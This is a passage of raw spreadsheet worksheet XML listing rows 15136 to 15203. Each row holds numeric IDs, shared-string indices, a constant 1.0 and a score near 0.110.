      <c r="C15136" s="2" t="s">
        <v>14596</v>
      </c>
      <c r="D15136" s="2">
        <v>1.0</v>
      </c>
      <c r="E15136" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15136" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15137" ht="15.75" customHeight="1">
      <c r="A15137" s="1">
        <v>14310.0</v>
      </c>
      <c r="B15137" s="2">
        <v>3.8625921E7</v>
      </c>
      <c r="C15137" s="2" t="s">
        <v>14597</v>
      </c>
      <c r="D15137" s="2">
        <v>1.0</v>
      </c>
      <c r="E15137" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15137" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15138" ht="15.75" customHeight="1">
      <c r="A15138" s="1">
        <v>16896.0</v>
      </c>
      <c r="B15138" s="2">
        <v>4.8072875E7</v>
      </c>
      <c r="C15138" s="2" t="s">
        <v>14598</v>
      </c>
      <c r="D15138" s="2">
        <v>1.0</v>
      </c>
      <c r="E15138" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15138" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15139" ht="15.75" customHeight="1">
      <c r="A15139" s="1">
        <v>20916.0</v>
      </c>
      <c r="B15139" s="2">
        <v>1.6374833E7</v>
      </c>
      <c r="C15139" s="2" t="s">
        <v>14599</v>
      </c>
      <c r="D15139" s="2">
        <v>1.0</v>
      </c>
      <c r="E15139" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15139" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15140" ht="15.75" customHeight="1">
      <c r="A15140" s="1">
        <v>25862.0</v>
      </c>
      <c r="B15140" s="2">
        <v>1.4881654E7</v>
      </c>
      <c r="C15140" s="2" t="s">
        <v>14600</v>
      </c>
      <c r="D15140" s="2">
        <v>1.0</v>
      </c>
      <c r="E15140" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15140" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15141" ht="15.75" customHeight="1">
      <c r="A15141" s="1">
        <v>29477.0</v>
      </c>
      <c r="B15141" s="2">
        <v>3.239986E7</v>
      </c>
      <c r="C15141" s="2" t="s">
        <v>14601</v>
      </c>
      <c r="D15141" s="2">
        <v>1.0</v>
      </c>
      <c r="E15141" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15141" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15142" ht="15.75" customHeight="1">
      <c r="A15142" s="1">
        <v>3866.0</v>
      </c>
      <c r="B15142" s="2">
        <v>4.0329895E7</v>
      </c>
      <c r="C15142" s="2" t="s">
        <v>14602</v>
      </c>
      <c r="D15142" s="2">
        <v>1.0</v>
      </c>
      <c r="E15142" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15142" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="15143" ht="15.75" customHeight="1">
      <c r="A15143" s="1">
        <v>27837.0</v>
      </c>
      <c r="B15143" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C15143" s="2" t="s">
        <v>14603</v>
      </c>
      <c r="D15143" s="2">
        <v>1.0</v>
      </c>
      <c r="E15143" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15143" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="15144" ht="15.75" customHeight="1">
      <c r="A15144" s="1">
        <v>452.0</v>
      </c>
      <c r="B15144" s="2">
        <v>1.7216264E7</v>
      </c>
      <c r="C15144" s="2" t="s">
        <v>14604</v>
      </c>
      <c r="D15144" s="2">
        <v>1.0</v>
      </c>
      <c r="E15144" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15144" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15145" ht="15.75" customHeight="1">
      <c r="A15145" s="1">
        <v>592.0</v>
      </c>
      <c r="B15145" s="2">
        <v>1.9197788E7</v>
      </c>
      <c r="C15145" s="2" t="s">
        <v>14605</v>
      </c>
      <c r="D15145" s="2">
        <v>1.0</v>
      </c>
      <c r="E15145" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15145" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15146" ht="15.75" customHeight="1">
      <c r="A15146" s="1">
        <v>958.0</v>
      </c>
      <c r="B15146" s="2">
        <v>2.2656269E7</v>
      </c>
      <c r="C15146" s="2" t="s">
        <v>14606</v>
      </c>
      <c r="D15146" s="2">
        <v>1.0</v>
      </c>
      <c r="E15146" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15146" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15147" ht="15.75" customHeight="1">
      <c r="A15147" s="1">
        <v>1185.0</v>
      </c>
      <c r="B15147" s="2">
        <v>2.4677182E7</v>
      </c>
      <c r="C15147" s="2" t="s">
        <v>14607</v>
      </c>
      <c r="D15147" s="2">
        <v>1.0</v>
      </c>
      <c r="E15147" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15147" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15148" ht="15.75" customHeight="1">
      <c r="A15148" s="1">
        <v>1237.0</v>
      </c>
      <c r="B15148" s="2">
        <v>2.5084907E7</v>
      </c>
      <c r="C15148" s="2" t="s">
        <v>14608</v>
      </c>
      <c r="D15148" s="2">
        <v>1.0</v>
      </c>
      <c r="E15148" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15148" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15149" ht="15.75" customHeight="1">
      <c r="A15149" s="1">
        <v>1395.0</v>
      </c>
      <c r="B15149" s="2">
        <v>2.6272704E7</v>
      </c>
      <c r="C15149" s="2" t="s">
        <v>14609</v>
      </c>
      <c r="D15149" s="2">
        <v>1.0</v>
      </c>
      <c r="E15149" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15149" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15150" ht="15.75" customHeight="1">
      <c r="A15150" s="1">
        <v>1851.0</v>
      </c>
      <c r="B15150" s="2">
        <v>2.9475894E7</v>
      </c>
      <c r="C15150" s="2" t="s">
        <v>14610</v>
      </c>
      <c r="D15150" s="2">
        <v>1.0</v>
      </c>
      <c r="E15150" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15150" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15151" ht="15.75" customHeight="1">
      <c r="A15151" s="1">
        <v>3118.0</v>
      </c>
      <c r="B15151" s="2">
        <v>3.6805499E7</v>
      </c>
      <c r="C15151" s="2" t="s">
        <v>14611</v>
      </c>
      <c r="D15151" s="2">
        <v>1.0</v>
      </c>
      <c r="E15151" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15151" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15152" ht="15.75" customHeight="1">
      <c r="A15152" s="1">
        <v>4074.0</v>
      </c>
      <c r="B15152" s="2">
        <v>4.1175995E7</v>
      </c>
      <c r="C15152" s="2" t="s">
        <v>14612</v>
      </c>
      <c r="D15152" s="2">
        <v>1.0</v>
      </c>
      <c r="E15152" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15152" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15153" ht="15.75" customHeight="1">
      <c r="A15153" s="1">
        <v>4468.0</v>
      </c>
      <c r="B15153" s="2">
        <v>4.2464245E7</v>
      </c>
      <c r="C15153" s="2" t="s">
        <v>14613</v>
      </c>
      <c r="D15153" s="2">
        <v>1.0</v>
      </c>
      <c r="E15153" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15153" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15154" ht="15.75" customHeight="1">
      <c r="A15154" s="1">
        <v>4515.0</v>
      </c>
      <c r="B15154" s="2">
        <v>4.260454E7</v>
      </c>
      <c r="C15154" s="2" t="s">
        <v>14614</v>
      </c>
      <c r="D15154" s="2">
        <v>1.0</v>
      </c>
      <c r="E15154" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15154" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15155" ht="15.75" customHeight="1">
      <c r="A15155" s="1">
        <v>4612.0</v>
      </c>
      <c r="B15155" s="2">
        <v>4.2909915E7</v>
      </c>
      <c r="C15155" s="2" t="s">
        <v>14615</v>
      </c>
      <c r="D15155" s="2">
        <v>1.0</v>
      </c>
      <c r="E15155" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15155" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15156" ht="15.75" customHeight="1">
      <c r="A15156" s="1">
        <v>5487.0</v>
      </c>
      <c r="B15156" s="2">
        <v>4.577119E7</v>
      </c>
      <c r="C15156" s="2" t="s">
        <v>14616</v>
      </c>
      <c r="D15156" s="2">
        <v>1.0</v>
      </c>
      <c r="E15156" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15156" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15157" ht="15.75" customHeight="1">
      <c r="A15157" s="1">
        <v>5623.0</v>
      </c>
      <c r="B15157" s="2">
        <v>4.6186959E7</v>
      </c>
      <c r="C15157" s="2" t="s">
        <v>14617</v>
      </c>
      <c r="D15157" s="2">
        <v>1.0</v>
      </c>
      <c r="E15157" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15157" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15158" ht="15.75" customHeight="1">
      <c r="A15158" s="1">
        <v>5636.0</v>
      </c>
      <c r="B15158" s="2">
        <v>4.6246197E7</v>
      </c>
      <c r="C15158" s="2" t="s">
        <v>14618</v>
      </c>
      <c r="D15158" s="2">
        <v>1.0</v>
      </c>
      <c r="E15158" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15158" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15159" ht="15.75" customHeight="1">
      <c r="A15159" s="1">
        <v>7038.0</v>
      </c>
      <c r="B15159" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C15159" s="2" t="s">
        <v>12344</v>
      </c>
      <c r="D15159" s="2">
        <v>1.0</v>
      </c>
      <c r="E15159" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15159" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15160" ht="15.75" customHeight="1">
      <c r="A15160" s="1">
        <v>7066.0</v>
      </c>
      <c r="B15160" s="2">
        <v>5.0234692E7</v>
      </c>
      <c r="C15160" s="2" t="s">
        <v>14619</v>
      </c>
      <c r="D15160" s="2">
        <v>1.0</v>
      </c>
      <c r="E15160" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15160" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15161" ht="15.75" customHeight="1">
      <c r="A15161" s="1">
        <v>7368.0</v>
      </c>
      <c r="B15161" s="2">
        <v>5.1028698E7</v>
      </c>
      <c r="C15161" s="2" t="s">
        <v>14620</v>
      </c>
      <c r="D15161" s="2">
        <v>1.0</v>
      </c>
      <c r="E15161" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15161" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15162" ht="15.75" customHeight="1">
      <c r="A15162" s="1">
        <v>7956.0</v>
      </c>
      <c r="B15162" s="2">
        <v>5.2654314E7</v>
      </c>
      <c r="C15162" s="2" t="s">
        <v>14621</v>
      </c>
      <c r="D15162" s="2">
        <v>1.0</v>
      </c>
      <c r="E15162" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15162" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15163" ht="15.75" customHeight="1">
      <c r="A15163" s="1">
        <v>8243.0</v>
      </c>
      <c r="B15163" s="2">
        <v>5.3365329E7</v>
      </c>
      <c r="C15163" s="2" t="s">
        <v>14622</v>
      </c>
      <c r="D15163" s="2">
        <v>1.0</v>
      </c>
      <c r="E15163" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15163" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15164" ht="15.75" customHeight="1">
      <c r="A15164" s="1">
        <v>8417.0</v>
      </c>
      <c r="B15164" s="2">
        <v>5.391826E7</v>
      </c>
      <c r="C15164" s="2" t="s">
        <v>14623</v>
      </c>
      <c r="D15164" s="2">
        <v>1.0</v>
      </c>
      <c r="E15164" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15164" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15165" ht="15.75" customHeight="1">
      <c r="A15165" s="1">
        <v>8678.0</v>
      </c>
      <c r="B15165" s="2">
        <v>5.4391482E7</v>
      </c>
      <c r="C15165" s="2" t="s">
        <v>14624</v>
      </c>
      <c r="D15165" s="2">
        <v>1.0</v>
      </c>
      <c r="E15165" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15165" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15166" ht="15.75" customHeight="1">
      <c r="A15166" s="1">
        <v>8697.0</v>
      </c>
      <c r="B15166" s="2">
        <v>5.4432417E7</v>
      </c>
      <c r="C15166" s="2" t="s">
        <v>14625</v>
      </c>
      <c r="D15166" s="2">
        <v>1.0</v>
      </c>
      <c r="E15166" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15166" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15167" ht="15.75" customHeight="1">
      <c r="A15167" s="1">
        <v>8799.0</v>
      </c>
      <c r="B15167" s="2">
        <v>5.4611684E7</v>
      </c>
      <c r="C15167" s="2" t="s">
        <v>14626</v>
      </c>
      <c r="D15167" s="2">
        <v>1.0</v>
      </c>
      <c r="E15167" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15167" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15168" ht="15.75" customHeight="1">
      <c r="A15168" s="1">
        <v>8873.0</v>
      </c>
      <c r="B15168" s="2">
        <v>5.4748586E7</v>
      </c>
      <c r="C15168" s="2" t="s">
        <v>14627</v>
      </c>
      <c r="D15168" s="2">
        <v>1.0</v>
      </c>
      <c r="E15168" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15168" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15169" ht="15.75" customHeight="1">
      <c r="A15169" s="1">
        <v>9019.0</v>
      </c>
      <c r="B15169" s="2">
        <v>5.5003082E7</v>
      </c>
      <c r="C15169" s="2" t="s">
        <v>14628</v>
      </c>
      <c r="D15169" s="2">
        <v>1.0</v>
      </c>
      <c r="E15169" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15169" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15170" ht="15.75" customHeight="1">
      <c r="A15170" s="1">
        <v>9825.0</v>
      </c>
      <c r="B15170" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C15170" s="2" t="s">
        <v>14629</v>
      </c>
      <c r="D15170" s="2">
        <v>1.0</v>
      </c>
      <c r="E15170" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15170" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15171" ht="15.75" customHeight="1">
      <c r="A15171" s="1">
        <v>10404.0</v>
      </c>
      <c r="B15171" s="2">
        <v>9653692.0</v>
      </c>
      <c r="C15171" s="2" t="s">
        <v>14630</v>
      </c>
      <c r="D15171" s="2">
        <v>1.0</v>
      </c>
      <c r="E15171" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15171" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15172" ht="15.75" customHeight="1">
      <c r="A15172" s="1">
        <v>11128.0</v>
      </c>
      <c r="B15172" s="2">
        <v>1.9095354E7</v>
      </c>
      <c r="C15172" s="2" t="s">
        <v>14631</v>
      </c>
      <c r="D15172" s="2">
        <v>1.0</v>
      </c>
      <c r="E15172" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15172" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15173" ht="15.75" customHeight="1">
      <c r="A15173" s="1">
        <v>11423.0</v>
      </c>
      <c r="B15173" s="2">
        <v>2.1728842E7</v>
      </c>
      <c r="C15173" s="2" t="s">
        <v>14632</v>
      </c>
      <c r="D15173" s="2">
        <v>1.0</v>
      </c>
      <c r="E15173" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15173" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15174" ht="15.75" customHeight="1">
      <c r="A15174" s="1">
        <v>12061.0</v>
      </c>
      <c r="B15174" s="2">
        <v>2.6522399E7</v>
      </c>
      <c r="C15174" s="2" t="s">
        <v>14633</v>
      </c>
      <c r="D15174" s="2">
        <v>1.0</v>
      </c>
      <c r="E15174" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15174" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15175" ht="15.75" customHeight="1">
      <c r="A15175" s="1">
        <v>13552.0</v>
      </c>
      <c r="B15175" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C15175" s="2" t="s">
        <v>14634</v>
      </c>
      <c r="D15175" s="2">
        <v>1.0</v>
      </c>
      <c r="E15175" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15175" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15176" ht="15.75" customHeight="1">
      <c r="A15176" s="1">
        <v>13707.0</v>
      </c>
      <c r="B15176" s="2">
        <v>3.6214706E7</v>
      </c>
      <c r="C15176" s="2" t="s">
        <v>14635</v>
      </c>
      <c r="D15176" s="2">
        <v>1.0</v>
      </c>
      <c r="E15176" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15176" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15177" ht="15.75" customHeight="1">
      <c r="A15177" s="1">
        <v>14247.0</v>
      </c>
      <c r="B15177" s="2">
        <v>3.8362077E7</v>
      </c>
      <c r="C15177" s="2" t="s">
        <v>14636</v>
      </c>
      <c r="D15177" s="2">
        <v>1.0</v>
      </c>
      <c r="E15177" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15177" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15178" ht="15.75" customHeight="1">
      <c r="A15178" s="1">
        <v>14708.0</v>
      </c>
      <c r="B15178" s="2">
        <v>4.0618379E7</v>
      </c>
      <c r="C15178" s="2" t="s">
        <v>14637</v>
      </c>
      <c r="D15178" s="2">
        <v>1.0</v>
      </c>
      <c r="E15178" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15178" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15179" ht="15.75" customHeight="1">
      <c r="A15179" s="1">
        <v>15252.0</v>
      </c>
      <c r="B15179" s="2">
        <v>4.2286073E7</v>
      </c>
      <c r="C15179" s="2" t="s">
        <v>14638</v>
      </c>
      <c r="D15179" s="2">
        <v>1.0</v>
      </c>
      <c r="E15179" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15179" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15180" ht="15.75" customHeight="1">
      <c r="A15180" s="1">
        <v>15463.0</v>
      </c>
      <c r="B15180" s="2">
        <v>4.3114975E7</v>
      </c>
      <c r="C15180" s="2" t="s">
        <v>14639</v>
      </c>
      <c r="D15180" s="2">
        <v>1.0</v>
      </c>
      <c r="E15180" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15180" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15181" ht="15.75" customHeight="1">
      <c r="A15181" s="1">
        <v>15762.0</v>
      </c>
      <c r="B15181" s="2">
        <v>4.4171052E7</v>
      </c>
      <c r="C15181" s="2" t="s">
        <v>14640</v>
      </c>
      <c r="D15181" s="2">
        <v>1.0</v>
      </c>
      <c r="E15181" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15181" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15182" ht="15.75" customHeight="1">
      <c r="A15182" s="1">
        <v>16890.0</v>
      </c>
      <c r="B15182" s="2">
        <v>4.8038415E7</v>
      </c>
      <c r="C15182" s="2" t="s">
        <v>14641</v>
      </c>
      <c r="D15182" s="2">
        <v>1.0</v>
      </c>
      <c r="E15182" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15182" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15183" ht="15.75" customHeight="1">
      <c r="A15183" s="1">
        <v>16983.0</v>
      </c>
      <c r="B15183" s="2">
        <v>4.8327119E7</v>
      </c>
      <c r="C15183" s="2" t="s">
        <v>14642</v>
      </c>
      <c r="D15183" s="2">
        <v>1.0</v>
      </c>
      <c r="E15183" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15183" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15184" ht="15.75" customHeight="1">
      <c r="A15184" s="1">
        <v>17284.0</v>
      </c>
      <c r="B15184" s="2">
        <v>4.9213059E7</v>
      </c>
      <c r="C15184" s="2" t="s">
        <v>14643</v>
      </c>
      <c r="D15184" s="2">
        <v>1.0</v>
      </c>
      <c r="E15184" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15184" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15185" ht="15.75" customHeight="1">
      <c r="A15185" s="1">
        <v>17527.0</v>
      </c>
      <c r="B15185" s="2">
        <v>5.0097256E7</v>
      </c>
      <c r="C15185" s="2" t="s">
        <v>14644</v>
      </c>
      <c r="D15185" s="2">
        <v>1.0</v>
      </c>
      <c r="E15185" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15185" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15186" ht="15.75" customHeight="1">
      <c r="A15186" s="1">
        <v>17533.0</v>
      </c>
      <c r="B15186" s="2">
        <v>5.0112937E7</v>
      </c>
      <c r="C15186" s="2" t="s">
        <v>14645</v>
      </c>
      <c r="D15186" s="2">
        <v>1.0</v>
      </c>
      <c r="E15186" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15186" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15187" ht="15.75" customHeight="1">
      <c r="A15187" s="1">
        <v>18312.0</v>
      </c>
      <c r="B15187" s="2">
        <v>5.2376641E7</v>
      </c>
      <c r="C15187" s="2" t="s">
        <v>14646</v>
      </c>
      <c r="D15187" s="2">
        <v>1.0</v>
      </c>
      <c r="E15187" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15187" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15188" ht="15.75" customHeight="1">
      <c r="A15188" s="1">
        <v>18444.0</v>
      </c>
      <c r="B15188" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C15188" s="2" t="s">
        <v>14647</v>
      </c>
      <c r="D15188" s="2">
        <v>1.0</v>
      </c>
      <c r="E15188" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15188" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15189" ht="15.75" customHeight="1">
      <c r="A15189" s="1">
        <v>18585.0</v>
      </c>
      <c r="B15189" s="2">
        <v>5.3255604E7</v>
      </c>
      <c r="C15189" s="2" t="s">
        <v>14648</v>
      </c>
      <c r="D15189" s="2">
        <v>1.0</v>
      </c>
      <c r="E15189" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15189" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15190" ht="15.75" customHeight="1">
      <c r="A15190" s="1">
        <v>18762.0</v>
      </c>
      <c r="B15190" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C15190" s="2" t="s">
        <v>14649</v>
      </c>
      <c r="D15190" s="2">
        <v>1.0</v>
      </c>
      <c r="E15190" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15190" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15191" ht="15.75" customHeight="1">
      <c r="A15191" s="1">
        <v>18879.0</v>
      </c>
      <c r="B15191" s="2">
        <v>5.4087322E7</v>
      </c>
      <c r="C15191" s="2" t="s">
        <v>14650</v>
      </c>
      <c r="D15191" s="2">
        <v>1.0</v>
      </c>
      <c r="E15191" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15191" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15192" ht="15.75" customHeight="1">
      <c r="A15192" s="1">
        <v>20504.0</v>
      </c>
      <c r="B15192" s="2">
        <v>1.2950568E7</v>
      </c>
      <c r="C15192" s="2" t="s">
        <v>14651</v>
      </c>
      <c r="D15192" s="2">
        <v>1.0</v>
      </c>
      <c r="E15192" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15192" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15193" ht="15.75" customHeight="1">
      <c r="A15193" s="1">
        <v>21711.0</v>
      </c>
      <c r="B15193" s="2">
        <v>2.5400162E7</v>
      </c>
      <c r="C15193" s="2" t="s">
        <v>14652</v>
      </c>
      <c r="D15193" s="2">
        <v>1.0</v>
      </c>
      <c r="E15193" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15193" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15194" ht="15.75" customHeight="1">
      <c r="A15194" s="1">
        <v>23491.0</v>
      </c>
      <c r="B15194" s="2">
        <v>5751103.0</v>
      </c>
      <c r="C15194" s="2" t="s">
        <v>14653</v>
      </c>
      <c r="D15194" s="2">
        <v>1.0</v>
      </c>
      <c r="E15194" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15194" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15195" ht="15.75" customHeight="1">
      <c r="A15195" s="1">
        <v>24259.0</v>
      </c>
      <c r="B15195" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C15195" s="2" t="s">
        <v>14654</v>
      </c>
      <c r="D15195" s="2">
        <v>1.0</v>
      </c>
      <c r="E15195" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15195" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15196" ht="15.75" customHeight="1">
      <c r="A15196" s="1">
        <v>26533.0</v>
      </c>
      <c r="B15196" s="2">
        <v>1.7708271E7</v>
      </c>
      <c r="C15196" s="2" t="s">
        <v>14545</v>
      </c>
      <c r="D15196" s="2">
        <v>1.0</v>
      </c>
      <c r="E15196" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15196" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15197" ht="15.75" customHeight="1">
      <c r="A15197" s="1">
        <v>26884.0</v>
      </c>
      <c r="B15197" s="2">
        <v>1.9206809E7</v>
      </c>
      <c r="C15197" s="2" t="s">
        <v>14655</v>
      </c>
      <c r="D15197" s="2">
        <v>1.0</v>
      </c>
      <c r="E15197" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15197" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15198" ht="15.75" customHeight="1">
      <c r="A15198" s="1">
        <v>26947.0</v>
      </c>
      <c r="B15198" s="2">
        <v>1.9590839E7</v>
      </c>
      <c r="C15198" s="2" t="s">
        <v>14656</v>
      </c>
      <c r="D15198" s="2">
        <v>1.0</v>
      </c>
      <c r="E15198" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15198" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15199" ht="15.75" customHeight="1">
      <c r="A15199" s="1">
        <v>28242.0</v>
      </c>
      <c r="B15199" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C15199" s="2" t="s">
        <v>14657</v>
      </c>
      <c r="D15199" s="2">
        <v>1.0</v>
      </c>
      <c r="E15199" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15199" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15200" ht="15.75" customHeight="1">
      <c r="A15200" s="1">
        <v>31948.0</v>
      </c>
      <c r="B15200" s="2">
        <v>5.3098272E7</v>
      </c>
      <c r="C15200" s="2" t="s">
        <v>14658</v>
      </c>
      <c r="D15200" s="2">
        <v>1.0</v>
      </c>
      <c r="E15200" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15200" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15201" ht="15.75" customHeight="1">
      <c r="A15201" s="1">
        <v>31986.0</v>
      </c>
      <c r="B15201" s="2">
        <v>5328817.0</v>
      </c>
      <c r="C15201" s="2" t="s">
        <v>14659</v>
      </c>
      <c r="D15201" s="2">
        <v>1.0</v>
      </c>
      <c r="E15201" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15201" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15202" ht="15.75" customHeight="1">
      <c r="A15202" s="1">
        <v>32369.0</v>
      </c>
      <c r="B15202" s="2">
        <v>5600429.0</v>
      </c>
      <c r="C15202" s="2" t="s">
        <v>14660</v>
      </c>
      <c r="D15202" s="2">
        <v>1.0</v>
      </c>
      <c r="E15202" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15202" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15203" ht="15.75" customHeight="1">
      <c r="A15203" s="1">
        <v>33009.0</v>
      </c>
      <c r="B15203" s="2">
        <v>6649178.0</v>
      </c>
